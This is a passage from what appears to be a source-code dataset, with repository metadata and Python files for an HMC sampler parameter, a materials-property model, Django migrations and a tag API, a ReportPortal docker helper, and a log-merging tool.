] | null | null | null | src/LocalChoiceModel/vel_param.py | noashin/local_global_attention_model | 531e6a4cc1dc364a6a4168de1b9f972727a8aeb1 | [
"MIT"
] | null | null | null | import sys
import numpy as np
from scipy.stats import multivariate_normal
sys.path.append('./../../')
from src.HMC.hmcparameter import HMCParameter
class VelParam(HMCParameter):
def __init__(self, init_val):
super().__init__(np.array(init_val))
dim = np.array(init_val).shape
self.mu = np.zeros(dim)
self.sigma = 1
def gen_init_value(self):
self.value = multivariate_normal.rvs(self.mu, self.sigma)
def get_energy_grad(self):
return self.value
def get_energy(self):
return np.dot(self.value, self.value) / 2
def get_energy_for_value(self, value):
return np.dot(value, value) / 2
| 24.814815 | 65 | 0.665672 | import sys
import numpy as np
from scipy.stats import multivariate_normal
sys.path.append('./../../')
from src.HMC.hmcparameter import HMCParameter
class VelParam(HMCParameter):
def __init__(self, init_val):
super().__init__(np.array(init_val))
dim = np.array(init_val).shape
self.mu = np.zeros(dim)
self.sigma = 1
def gen_init_value(self):
self.value = multivariate_normal.rvs(self.mu, self.sigma)
def get_energy_grad(self):
return self.value
def get_energy(self):
return np.dot(self.value, self.value) / 2
def get_energy_for_value(self, value):
return np.dot(value, value) / 2
| true | true |
f719245ed4a4fb729ba07d5a218d16d0af49e06d | 1,972 | py | Python | propnet/models/python/electromechanical_coupling.py | ruriboshi/propnet | 770703fb4fc344f785f89c02f26b31ea5733d2bd | [
"BSD-3-Clause-LBNL"
] | 57 | 2018-01-09T14:56:20.000Z | 2022-02-24T11:44:42.000Z | propnet/models/python/electromechanical_coupling.py | ruriboshi/propnet | 770703fb4fc344f785f89c02f26b31ea5733d2bd | [
"BSD-3-Clause-LBNL"
] | 214 | 2017-09-26T23:31:09.000Z | 2022-03-14T04:50:58.000Z | propnet/models/python/electromechanical_coupling.py | ruriboshi/propnet | 770703fb4fc344f785f89c02f26b31ea5733d2bd | [
"BSD-3-Clause-LBNL"
] | 26 | 2017-10-29T21:34:22.000Z | 2022-01-12T05:59:12.000Z | import numpy as np
def plug_in(symbol_values):
req_symbols = ["S", "e", "d"]
data = {}
if all(s in symbol_values for s in req_symbols):
e = symbol_values["e"]
S = symbol_values["S"]
d = symbol_values["d"]
data["k"] = np.abs(d[2][2] / np.sqrt(e[2][2] * S[2][2]))
return data
DESCRIPTION = """
Model calculating the electromechanical coupling factor,
which is the efficiency of converting eletrical energy
to acoustic energy in a piezoeletric transducer or filter
"""
test_data = [{
"inputs": {
"S": [[0.007482236755310126, -0.002827041595205337, -0.002827041595205337, 0.0, 0.0, 0.0],
[-0.002827041595205337, 0.007482236755310125, -0.002827041595205337, 0.0, 0.0, 0.0],
[-0.0028270415952053366, -0.002827041595205337, 0.007482236755310125, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.010309278350515464, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.010309278350515464, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.010309278350515464]],
"e": [[18.65, 0.00, 0.00], [-0.00, 18.65, 0.00], [-0.00, 0.00, 7.88]],
"d": [[-0.0412497, -0.28686697, 0.06342802], [0.05065159, 0.26064878, -0.04828778],
[0.08828203, 0.5660897, -0.11520665], [-0.16218673, -0.92468949, 0.2109461],
[0.02485558, 0.03232004, -0.02421919], [0.06636329, 0.46541895, -0.09526407]]
},
"outputs": {
"k": 0.47445902984
}
}]
config = {
"name": "electromechanical_coupling",
"connections": [{
"inputs": ["e", "S", "d"],
"outputs": ["k"]
}],
"categories": ["mechanical", "electrical"],
"variable_symbol_map": {
"S": "compliance_tensor_voigt",
"e": "dielectric_tensor",
"d": "piezoelectric_tensor_converse",
"k": "electromechanical_coupling"
},
"description": DESCRIPTION,
"implemented_by": ["shyamd"],
"references": [],
"plug_in": plug_in,
"test_data": test_data
}
| 32.866667 | 111 | 0.573022 | import numpy as np
def plug_in(symbol_values):
req_symbols = ["S", "e", "d"]
data = {}
if all(s in symbol_values for s in req_symbols):
e = symbol_values["e"]
S = symbol_values["S"]
d = symbol_values["d"]
data["k"] = np.abs(d[2][2] / np.sqrt(e[2][2] * S[2][2]))
return data
DESCRIPTION = """
Model calculating the electromechanical coupling factor,
which is the efficiency of converting eletrical energy
to acoustic energy in a piezoeletric transducer or filter
"""
test_data = [{
"inputs": {
"S": [[0.007482236755310126, -0.002827041595205337, -0.002827041595205337, 0.0, 0.0, 0.0],
[-0.002827041595205337, 0.007482236755310125, -0.002827041595205337, 0.0, 0.0, 0.0],
[-0.0028270415952053366, -0.002827041595205337, 0.007482236755310125, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.010309278350515464, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.010309278350515464, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.010309278350515464]],
"e": [[18.65, 0.00, 0.00], [-0.00, 18.65, 0.00], [-0.00, 0.00, 7.88]],
"d": [[-0.0412497, -0.28686697, 0.06342802], [0.05065159, 0.26064878, -0.04828778],
[0.08828203, 0.5660897, -0.11520665], [-0.16218673, -0.92468949, 0.2109461],
[0.02485558, 0.03232004, -0.02421919], [0.06636329, 0.46541895, -0.09526407]]
},
"outputs": {
"k": 0.47445902984
}
}]
config = {
"name": "electromechanical_coupling",
"connections": [{
"inputs": ["e", "S", "d"],
"outputs": ["k"]
}],
"categories": ["mechanical", "electrical"],
"variable_symbol_map": {
"S": "compliance_tensor_voigt",
"e": "dielectric_tensor",
"d": "piezoelectric_tensor_converse",
"k": "electromechanical_coupling"
},
"description": DESCRIPTION,
"implemented_by": ["shyamd"],
"references": [],
"plug_in": plug_in,
"test_data": test_data
}
| true | true |
f7192509abdc2fa2929bd17b5a5b981950b115dd | 875 | py | Python | forum/migrations/0008_auto_20180116_0137.py | SH-anonta/Discussion-Forum | 03c92916d4dd708ad76e0aa945aaecacb1eac30e | [
"MIT"
] | null | null | null | forum/migrations/0008_auto_20180116_0137.py | SH-anonta/Discussion-Forum | 03c92916d4dd708ad76e0aa945aaecacb1eac30e | [
"MIT"
] | null | null | null | forum/migrations/0008_auto_20180116_0137.py | SH-anonta/Discussion-Forum | 03c92916d4dd708ad76e0aa945aaecacb1eac30e | [
"MIT"
] | null | null | null | # Generated by Django 2.0.1 on 2018-01-15 19:37
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('forum', '0007_auto_20180113_1812'),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.DeleteModel(
name='User',
),
migrations.AddField(
model_name='userprofile',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| 28.225806 | 114 | 0.618286 |
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('forum', '0007_auto_20180113_1812'),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.DeleteModel(
name='User',
),
migrations.AddField(
model_name='userprofile',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| true | true |
f719250ed98ee5f352d386094fce8e0557ce50cb | 4,716 | py | Python | pylenium/scripts/report_portal.py | xtrakTD/pyleniumio | 3c4b3d86491dd3ccf0bc399a42e5336a3c9f7fa6 | [
"MIT"
] | 169 | 2020-03-16T15:04:42.000Z | 2022-03-31T18:53:41.000Z | pylenium/scripts/report_portal.py | xtrakTD/pyleniumio | 3c4b3d86491dd3ccf0bc399a42e5336a3c9f7fa6 | [
"MIT"
] | 163 | 2020-03-15T06:33:54.000Z | 2022-03-31T21:37:09.000Z | pylenium/scripts/report_portal.py | xtrakTD/pyleniumio | 3c4b3d86491dd3ccf0bc399a42e5336a3c9f7fa6 | [
"MIT"
] | 26 | 2020-03-28T05:43:22.000Z | 2022-02-11T16:46:34.000Z | """ ReportPortal.io integration
1. Download the ReportPortal `docker-compose.yml` file as "docker-compose.report-portal.yml"
2. Setup permissions for ElasticSearch
3. Configure the `YAML` file based on OS
4. `docker-compose up`
5. Open ReportPortal and login (change password afterwards)
"""
import platform
from pylenium.scripts import cli_utils
def __stop_containers():
""" Stop all ReportPortal containers.
Returns:
`CompletedProcess`
"""
command = 'docker stop $(docker ps -a -f "name=reportportal" --format "{{.Names}}")'
if platform.system() == 'Windows':
command = "FOR /f \"tokens=*\" %i IN " \
"('docker ps -a -f \"name=reportportal\" --format \"{{.Names}}\"') " \
"DO docker stop %i"
stop_containers_response = cli_utils.run_process(command, shell=True)
if stop_containers_response.returncode != 0:
raise EnvironmentError(f'[FAILED] {command}'
'\n\nUnable to stop ReportPortal containers:'
'\n * Make sure Docker is installed and running'
'\n * Make sure this command is run in the same dir as docker-compose.report-portal.yml'
f'\nResponse: {stop_containers_response}')
return stop_containers_response
def __remove_containers():
""" Remove all ReportPortal containers that are stopped.
Returns:
`CompletedProcess`
"""
command = 'docker rm $(docker ps -a -f "name=reportportal" --format "{{.Names}}")'
if platform.system() == 'Windows':
command = "FOR /f \"tokens=*\" %i IN " \
"('docker ps -a -f \"name=reportportal\" --format \"{{.Names}}\"') " \
"DO docker rm %i"
remove_containers_response = cli_utils.run_process(command, shell=True)
if remove_containers_response.returncode != 0:
raise EnvironmentError(f'[FAILED] {command}'
'\n\nUnable to remove ReportPortal containers after stopping them.'
f'\nResponse: {remove_containers_response}')
return remove_containers_response
def download_compose_yaml_file():
""" Download the ReportPortal docker-compose.yml file.
* It is recommended to run this from the Project Root because
this places the file as "docker-compose.report-portal.yml" in the context where this command was run.
Returns:
`CompletedProcess` if successful.
Raises:
`ConnectionError` if process returns non-zero status code.
"""
response = cli_utils.run_process([
'curl', 'https://raw.githubusercontent.com/reportportal/reportportal/master/docker-compose.yml',
'-o', './docker-compose.report-portal.yml'
])
if response.returncode != 0:
raise ConnectionError(f'\n\nUnable to download docker-compose file from ReportPortal repo. '
f'\nResponse: {response}')
return response
def compose_up():
""" Spin up a ReportPortal instance using docker-compose.report-portal.yml.
Returns:
`CompletedProcess`
Raises:
`EnvironmentError` if process returns non-zero status code.
"""
response = cli_utils.run_process([
'docker-compose', '-p', 'reportportal', # prefix containers with 'reportportal'
'-f', 'docker-compose.report-portal.yml', # use our auto-generated compose.yml
'up', '-d', '--force-recreate' # spin up in detached, "daemon mode"
])
if response.returncode != 0:
raise EnvironmentError('\n\nUnable to run "docker-compose" command to create ReportPortal instance.'
'\n * Make sure Docker is installed and running'
'\n * Make sure this command is run in the same dir as docker-compose.report-portal.yml'
f'\nResponse: {response}')
return response
def down():
""" Tear down the ReportPortal instance.
This does not use the docker-compose.report-portal.yml file because, depending on Docker version, you may
or may not have a network created that is not handled by docker-compose down.
1. Stop all reportportal containers
2. Kill (remove) all reportportal containers
3. Remove the reportportal_default network (depends on docker version)
Returns:
`CompletedProcess` for the
Raises:
`EnvironmentError` if process returns non-zero status code.
"""
__stop_containers()
__remove_containers()
remove_network_response = cli_utils.run_process([
'docker', 'network', 'rm', 'reportportal_default'
])
return remove_network_response
| 38.341463 | 119 | 0.6338 |
import platform
from pylenium.scripts import cli_utils
def __stop_containers():
command = 'docker stop $(docker ps -a -f "name=reportportal" --format "{{.Names}}")'
if platform.system() == 'Windows':
command = "FOR /f \"tokens=*\" %i IN " \
"('docker ps -a -f \"name=reportportal\" --format \"{{.Names}}\"') " \
"DO docker stop %i"
stop_containers_response = cli_utils.run_process(command, shell=True)
if stop_containers_response.returncode != 0:
raise EnvironmentError(f'[FAILED] {command}'
'\n\nUnable to stop ReportPortal containers:'
'\n * Make sure Docker is installed and running'
'\n * Make sure this command is run in the same dir as docker-compose.report-portal.yml'
f'\nResponse: {stop_containers_response}')
return stop_containers_response
def __remove_containers():
command = 'docker rm $(docker ps -a -f "name=reportportal" --format "{{.Names}}")'
if platform.system() == 'Windows':
command = "FOR /f \"tokens=*\" %i IN " \
"('docker ps -a -f \"name=reportportal\" --format \"{{.Names}}\"') " \
"DO docker rm %i"
remove_containers_response = cli_utils.run_process(command, shell=True)
if remove_containers_response.returncode != 0:
raise EnvironmentError(f'[FAILED] {command}'
'\n\nUnable to remove ReportPortal containers after stopping them.'
f'\nResponse: {remove_containers_response}')
return remove_containers_response
def download_compose_yaml_file():
response = cli_utils.run_process([
'curl', 'https://raw.githubusercontent.com/reportportal/reportportal/master/docker-compose.yml',
'-o', './docker-compose.report-portal.yml'
])
if response.returncode != 0:
raise ConnectionError(f'\n\nUnable to download docker-compose file from ReportPortal repo. '
f'\nResponse: {response}')
return response
def compose_up():
response = cli_utils.run_process([
'docker-compose', '-p', 'reportportal',
'-f', 'docker-compose.report-portal.yml',
'up', '-d', '--force-recreate'
])
if response.returncode != 0:
raise EnvironmentError('\n\nUnable to run "docker-compose" command to create ReportPortal instance.'
'\n * Make sure Docker is installed and running'
'\n * Make sure this command is run in the same dir as docker-compose.report-portal.yml'
f'\nResponse: {response}')
return response
def down():
__stop_containers()
__remove_containers()
remove_network_response = cli_utils.run_process([
'docker', 'network', 'rm', 'reportportal_default'
])
return remove_network_response
| true | true |
f71925bd9fe55e2d80c707e532175799b9940cd4 | 147 | py | Python | src/radical/pilot/worker/__init__.py | eirrgang/radical.pilot | ceccd1867dd172935d602ff4c33a5ed4467e0dc8 | [
"MIT"
] | 47 | 2015-03-16T01:08:11.000Z | 2022-02-02T10:36:39.000Z | src/radical/pilot/worker/__init__.py | eirrgang/radical.pilot | ceccd1867dd172935d602ff4c33a5ed4467e0dc8 | [
"MIT"
] | 1,856 | 2015-01-02T09:32:20.000Z | 2022-03-31T21:45:06.000Z | src/radical/pilot/worker/__init__.py | eirrgang/radical.pilot | ceccd1867dd172935d602ff4c33a5ed4467e0dc8 | [
"MIT"
] | 28 | 2015-06-10T18:15:14.000Z | 2021-11-07T04:36:45.000Z |
__copyright__ = "Copyright 2016, http://radical.rutgers.edu"
__license__ = "MIT"
from .update import Update
from .stager import Stager
| 16.333333 | 60 | 0.714286 |
__copyright__ = "Copyright 2016, http://radical.rutgers.edu"
__license__ = "MIT"
from .update import Update
from .stager import Stager
| true | true |
f71925dc3984013ee3e549051b9ebf44316eb766 | 8,888 | py | Python | exe/modules/Merger.py | KagenoMoheji/ActiveTabGanttLogger | 2d7c88e1c48d56126904d14e780a2588c69336fc | [
"MIT"
] | null | null | null | exe/modules/Merger.py | KagenoMoheji/ActiveTabGanttLogger | 2d7c88e1c48d56126904d14e780a2588c69336fc | [
"MIT"
] | null | null | null | exe/modules/Merger.py | KagenoMoheji/ActiveTabGanttLogger | 2d7c88e1c48d56126904d14e780a2588c69336fc | [
"MIT"
] | null | null | null | import os
import sys
import platform
import datetime
from modules.Public import StrFormatter
class Merger:
currdir = ""
mergedir = ""
run_merge = {
"active_tab": False,
"mouse": False,
"keyboard": False
}
strfmr = None
def __init__(self):
'''
Merge logs in folders in "ganttlogger_logs".
'''
self.strfmr = StrFormatter()
# Check whether current folder name is "ganttlogger_logs"
self.currdir = os.getcwd()
is_win = "Windows" in platform.platform(terse=True)
curr_name = ""
if is_win:
curr_name = self.currdir.split("\\")[-1]
else:
curr_name = self.currdir.split("/")[-1]
if curr_name != "ganttlogger_logs":
print(self.strfmr.get_colored_console_log("red",
"Error: You must move to a folder 'ganttlogger_logs'."))
sys.exit()
self.mergedir = "{currdir}/merged_{datetime}".format(currdir=self.currdir, datetime=datetime.datetime.now().strftime("%Y%m%d_%H%M%S"))
def start(self):
try:
select_log_names = set(["active_tab", "mouse", "keyboard"])
while True:
print(self.strfmr.get_colored_console_log("yellow",
"Select 'all' or names separated by ',' from ('active_tab'|'mouse'|'keyboard').: "), end="")
input_select = list(map(lambda s: s.strip(), (input().strip()).split(",")))
if not input_select[0]:
print(self.strfmr.get_colored_console_log("red",
"Error: Invalid input."))
continue
elif "all" in input_select:
if len(input_select) == 1:
self.run_merge["active_tab"] = True
self.run_merge["mouse"] = True
self.run_merge["keyboard"] = True
break
else:
print(self.strfmr.get_colored_console_log("red",
"Error: Too many select despite 'all'."))
continue
else:
xor_select = set(input_select) ^ select_log_names
if len(xor_select) == 0 or \
all(x in select_log_names for x in xor_select):
if "active_tab" in input_select:
self.run_merge["active_tab"] = True
if "mouse" in input_select:
self.run_merge["mouse"] = True
if "keyboard" in input_select:
self.run_merge["keyboard"] = True
break
else:
print(self.strfmr.get_colored_console_log("red",
"Error: There are some invalid names."))
continue
# Create new folder where is outputted merged logs
os.makedirs(os.path.dirname("{}/".format(self.mergedir)), exist_ok=True)
print("Created an output folder '{}'.".format(self.mergedir))
self.run()
except KeyboardInterrupt:
print("Exit")
sys.exit()
def run(self):
# Get dictionary of directorys in a folder "ganttlogger_logs" except for directorys including "merged" in its name.
log_folders = {f: None for f in os.listdir(self.currdir) if (os.path.isdir(os.path.join(self.currdir, f))) and (not "merged" in f)}
#
remove_keys_list = []
for key in log_folders.keys():
readme = "{dir}/{folder}/README.txt".format(dir=self.currdir, folder=key)
if not os.path.exists(readme):
remove_keys_list.append(key)
continue
# Read from text file until appearing 'StartDate' till 4 rows.
has_startdate = False
row_startdate = ""
with open(readme, "r", encoding="utf-8") as f:
for row in range(4):
row_startdate = f.readline()
if "StartDate" in row_startdate:
has_startdate = True
break
if not has_startdate: # If README.txt doesn't have a row "StartDate".
print(self.strfmr.get_colored_console_log("yellow",
"Warning: File '{readme}' doesn't have a row 'StartDate'.".format(readme=readme)))
remove_keys_list.append(key)
continue
# Add value of "StartDate" to list
try:
log_folders[key] = datetime.datetime.strptime((row_startdate.split(": ")[-1]).strip(), "%Y/%m/%d %H:%M:%S.%f")
except ValueError:
print(self.strfmr.get_colored_console_log("red",
"Error: Invalid format of a value of 'StartDate' in {readme}.".format(readme=readme)))
sys.exit()
# Remove values in specific keys in "log_folders"
for k in remove_keys_list:
log_folders.pop(k)
# Sort "log_folders" by datetime of values in ASC
log_folders = dict(sorted(log_folders.items(), key=lambda x:x[1]))
# print("""
# log_folders: {log_folders}
# """.format(log_folders=log_folders))
if self.run_merge["active_tab"]:
self.merge_active_tab_logs(log_folders)
if self.run_merge["mouse"]:
self.merge_mouse_logs(log_folders)
if self.run_merge["keyboard"]:
self.merge_keyboard_logs(log_folders)
def merge_active_tab_logs(self, sorted_folders_dict):
with open("{mergedir}/active_tab.log".format(mergedir=self.mergedir), "a", encoding="utf-8") as af:
af.write("StartTime]:+:[ApplicationName]:+:[TabText\n")
for folder in sorted_folders_dict:
try:
filedir = "{currdir}/{folder}/active_tab.log".format(currdir=self.currdir, folder=folder)
with open(filedir, "r", encoding="utf-8") as rf:
log = rf.read().strip() # Remove the last "\n"
splitted_log = log.split("\n", 1)
if "StartTime]:+:[" in splitted_log[0]:
log = splitted_log[1]
log += "\n"
af.write(log)
except FileNotFoundError:
print(self.strfmr.get_colored_console_log("red",
"Error: File '{filedir}' not found.".format(filedir=filedir)))
sys.exit()
print("ActiveTab merged!")
def merge_mouse_logs(self, sorted_folders_dict):
with open("{mergedir}/mouse.log".format(mergedir=self.mergedir), "a", encoding="utf-8") as af:
af.write("Time]:+:[MoveDistance\n")
for folder in sorted_folders_dict:
try:
filedir = "{currdir}/{folder}/mouse.log".format(currdir=self.currdir, folder=folder)
with open(filedir, "r", encoding="utf-8") as rf:
log = rf.read().strip() # Remove the last "\n"
splitted_log = log.split("\n", 1)
if "Time]:+:[" in splitted_log[0]:
log = splitted_log[1]
log += "\n"
af.write(log)
except FileNotFoundError:
print(self.strfmr.get_colored_console_log("red",
"Error: File '{filedir}' not found.".format(filedir=filedir)))
sys.exit()
print("Mouse merged!")
def merge_keyboard_logs(self, sorted_folders_dict):
with open("{mergedir}/keyboard.log".format(mergedir=self.mergedir), "a", encoding="utf-8") as af:
af.write("Time]:+:[PressCount\n")
for folder in sorted_folders_dict:
try:
filedir = "{currdir}/{folder}/keyboard.log".format(currdir=self.currdir, folder=folder)
with open(filedir, "r", encoding="utf-8") as rf:
log = rf.read().strip() # Remove the last "\n"
splitted_log = log.split("\n", 1)
if "Time]:+:[" in splitted_log[0]:
log = splitted_log[1]
log += "\n"
af.write(log)
except FileNotFoundError:
print(self.strfmr.get_colored_console_log("red",
"Error: File '{filedir}' not found.".format(filedir=filedir)))
sys.exit()
print("Keyboard merged!")
| 48.568306 | 143 | 0.507426 | import os
import sys
import platform
import datetime
from modules.Public import StrFormatter
class Merger:
currdir = ""
mergedir = ""
run_merge = {
"active_tab": False,
"mouse": False,
"keyboard": False
}
strfmr = None
def __init__(self):
self.strfmr = StrFormatter()
self.currdir = os.getcwd()
is_win = "Windows" in platform.platform(terse=True)
curr_name = ""
if is_win:
curr_name = self.currdir.split("\\")[-1]
else:
curr_name = self.currdir.split("/")[-1]
if curr_name != "ganttlogger_logs":
print(self.strfmr.get_colored_console_log("red",
"Error: You must move to a folder 'ganttlogger_logs'."))
sys.exit()
self.mergedir = "{currdir}/merged_{datetime}".format(currdir=self.currdir, datetime=datetime.datetime.now().strftime("%Y%m%d_%H%M%S"))
def start(self):
try:
select_log_names = set(["active_tab", "mouse", "keyboard"])
while True:
print(self.strfmr.get_colored_console_log("yellow",
"Select 'all' or names separated by ',' from ('active_tab'|'mouse'|'keyboard').: "), end="")
input_select = list(map(lambda s: s.strip(), (input().strip()).split(",")))
if not input_select[0]:
print(self.strfmr.get_colored_console_log("red",
"Error: Invalid input."))
continue
elif "all" in input_select:
if len(input_select) == 1:
self.run_merge["active_tab"] = True
self.run_merge["mouse"] = True
self.run_merge["keyboard"] = True
break
else:
print(self.strfmr.get_colored_console_log("red",
"Error: Too many select despite 'all'."))
continue
else:
xor_select = set(input_select) ^ select_log_names
if len(xor_select) == 0 or \
all(x in select_log_names for x in xor_select):
if "active_tab" in input_select:
self.run_merge["active_tab"] = True
if "mouse" in input_select:
self.run_merge["mouse"] = True
if "keyboard" in input_select:
self.run_merge["keyboard"] = True
break
else:
print(self.strfmr.get_colored_console_log("red",
"Error: There are some invalid names."))
continue
os.makedirs(os.path.dirname("{}/".format(self.mergedir)), exist_ok=True)
print("Created an output folder '{}'.".format(self.mergedir))
self.run()
except KeyboardInterrupt:
print("Exit")
sys.exit()
def run(self):
log_folders = {f: None for f in os.listdir(self.currdir) if (os.path.isdir(os.path.join(self.currdir, f))) and (not "merged" in f)}
remove_keys_list = []
for key in log_folders.keys():
readme = "{dir}/{folder}/README.txt".format(dir=self.currdir, folder=key)
if not os.path.exists(readme):
remove_keys_list.append(key)
continue
has_startdate = False
row_startdate = ""
with open(readme, "r", encoding="utf-8") as f:
for row in range(4):
row_startdate = f.readline()
if "StartDate" in row_startdate:
has_startdate = True
break
if not has_startdate:
print(self.strfmr.get_colored_console_log("yellow",
"Warning: File '{readme}' doesn't have a row 'StartDate'.".format(readme=readme)))
remove_keys_list.append(key)
continue
try:
log_folders[key] = datetime.datetime.strptime((row_startdate.split(": ")[-1]).strip(), "%Y/%m/%d %H:%M:%S.%f")
except ValueError:
print(self.strfmr.get_colored_console_log("red",
"Error: Invalid format of a value of 'StartDate' in {readme}.".format(readme=readme)))
sys.exit()
for k in remove_keys_list:
log_folders.pop(k)
log_folders = dict(sorted(log_folders.items(), key=lambda x:x[1]))
# log_folders: {log_folders}
# """.format(log_folders=log_folders))
if self.run_merge["active_tab"]:
self.merge_active_tab_logs(log_folders)
if self.run_merge["mouse"]:
self.merge_mouse_logs(log_folders)
if self.run_merge["keyboard"]:
self.merge_keyboard_logs(log_folders)
def merge_active_tab_logs(self, sorted_folders_dict):
with open("{mergedir}/active_tab.log".format(mergedir=self.mergedir), "a", encoding="utf-8") as af:
af.write("StartTime]:+:[ApplicationName]:+:[TabText\n")
for folder in sorted_folders_dict:
try:
filedir = "{currdir}/{folder}/active_tab.log".format(currdir=self.currdir, folder=folder)
with open(filedir, "r", encoding="utf-8") as rf:
log = rf.read().strip()
splitted_log = log.split("\n", 1)
if "StartTime]:+:[" in splitted_log[0]:
log = splitted_log[1]
log += "\n"
af.write(log)
except FileNotFoundError:
print(self.strfmr.get_colored_console_log("red",
"Error: File '{filedir}' not found.".format(filedir=filedir)))
sys.exit()
print("ActiveTab merged!")
def merge_mouse_logs(self, sorted_folders_dict):
with open("{mergedir}/mouse.log".format(mergedir=self.mergedir), "a", encoding="utf-8") as af:
af.write("Time]:+:[MoveDistance\n")
for folder in sorted_folders_dict:
try:
filedir = "{currdir}/{folder}/mouse.log".format(currdir=self.currdir, folder=folder)
with open(filedir, "r", encoding="utf-8") as rf:
log = rf.read().strip()
splitted_log = log.split("\n", 1)
if "Time]:+:[" in splitted_log[0]:
log = splitted_log[1]
log += "\n"
af.write(log)
except FileNotFoundError:
print(self.strfmr.get_colored_console_log("red",
"Error: File '{filedir}' not found.".format(filedir=filedir)))
sys.exit()
print("Mouse merged!")
def merge_keyboard_logs(self, sorted_folders_dict):
with open("{mergedir}/keyboard.log".format(mergedir=self.mergedir), "a", encoding="utf-8") as af:
af.write("Time]:+:[PressCount\n")
for folder in sorted_folders_dict:
try:
filedir = "{currdir}/{folder}/keyboard.log".format(currdir=self.currdir, folder=folder)
with open(filedir, "r", encoding="utf-8") as rf:
log = rf.read().strip()
splitted_log = log.split("\n", 1)
if "Time]:+:[" in splitted_log[0]:
log = splitted_log[1]
log += "\n"
af.write(log)
except FileNotFoundError:
print(self.strfmr.get_colored_console_log("red",
"Error: File '{filedir}' not found.".format(filedir=filedir)))
sys.exit()
print("Keyboard merged!")
| true | true |
f7192642ac4e4ccc76acb1a05c82ae929b697a48 | 3,870 | py | Python | website/src/globaly/rest_api.py | iamcholo/videoplatform | 72dd1db73e1c940e5992dacbb63feb8fc11394e3 | [
"Apache-2.0"
] | null | null | null | website/src/globaly/rest_api.py | iamcholo/videoplatform | 72dd1db73e1c940e5992dacbb63feb8fc11394e3 | [
"Apache-2.0"
] | 9 | 2020-06-05T19:18:35.000Z | 2022-03-11T23:30:50.000Z | website/src/globaly/rest_api.py | iamcholo/videoplatform | 72dd1db73e1c940e5992dacbb63feb8fc11394e3 | [
"Apache-2.0"
] | null | null | null | import json
from django.conf import settings
from django.http import Http404, HttpResponseRedirect, HttpResponse
from django.conf.urls import url, include
from rest_framework import routers, serializers, viewsets, generics
from rest_framework import status
from rest_framework.decorators import api_view, authentication_classes, permission_classes
from rest_framework.response import Response
from rest_framework.parsers import JSONParser
from rest_framework import generics
from globaly.models import GlobalyTags
from django.contrib.auth.models import User
from user.rest_authentication import IsAuthenticated
from django.db.models import Q
from decimal import Decimal as D
from django.db.models import Max
from django.utils.translation import ugettext_lazy as _
from django.dispatch import receiver
from django.db.models.signals import post_save
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
class GlobalyTagsSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = GlobalyTags
fields = (
'id',
'name',
'slug',
'meta_title',
'meta_description',
'publish',
'created',
'modified',
)
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def tag_list(request):
if request.method == 'GET':
tags = GlobalyTags.objects.filter(autor=request.user)
serializer = GlobalyTagsSerializer(
tags,
many=True,
context={'request': request}
)
return Response(serializer.data)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def tag_details(request):
if request.method == 'POST':
try:
pk = request.data.get('id')
tag = GlobalyTags.objects.get(
pk=pk
)
if tag.autor != request.user:
return Response(
status=status.HTTP_404_NOT_FOUND
)
except GlobalyTags.DoesNotExist:
return Response(
status=status.HTTP_404_NOT_FOUND
)
serializer = GlobalyTagsSerializer(
tag,
context={'request': request}
)
return Response(serializer.data)
return Response(
status=status.HTTP_204_NO_CONTENT
)
@api_view(['PUT','POST','DELETE'])
@permission_classes((IsAuthenticated,))
def tag(request):
if request.method == 'POST':
serializer = GlobalyTagsSerializer(
data=request.data,
context={'request': request}
)
if serializer.is_valid():
serializer.save(autor=request.user)
return Response(serializer.data)
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
if request.method == 'PUT' or request.method == 'DELETE':
try:
pk = request.data.get('id')
tag = GlobalyTags.objects.get(
pk=int(pk)
)
except GlobalyTags.DoesNotExist:
return Response(
status=status.HTTP_404_NOT_FOUND
)
if request.method == 'PUT':
serializer = GlobalyTagsSerializer(
tag,
data=request.data,
context={'request': request}
)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
if request.method == 'DELETE':
tag.delete()
return Response(
status=status.HTTP_204_NO_CONTENT
)
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
| 30.714286 | 90 | 0.605685 | import json
from django.conf import settings
from django.http import Http404, HttpResponseRedirect, HttpResponse
from django.conf.urls import url, include
from rest_framework import routers, serializers, viewsets, generics
from rest_framework import status
from rest_framework.decorators import api_view, authentication_classes, permission_classes
from rest_framework.response import Response
from rest_framework.parsers import JSONParser
from rest_framework import generics
from globaly.models import GlobalyTags
from django.contrib.auth.models import User
from user.rest_authentication import IsAuthenticated
from django.db.models import Q
from decimal import Decimal as D
from django.db.models import Max
from django.utils.translation import ugettext_lazy as _
from django.dispatch import receiver
from django.db.models.signals import post_save
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
class GlobalyTagsSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = GlobalyTags
fields = (
'id',
'name',
'slug',
'meta_title',
'meta_description',
'publish',
'created',
'modified',
)
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def tag_list(request):
if request.method == 'GET':
tags = GlobalyTags.objects.filter(autor=request.user)
serializer = GlobalyTagsSerializer(
tags,
many=True,
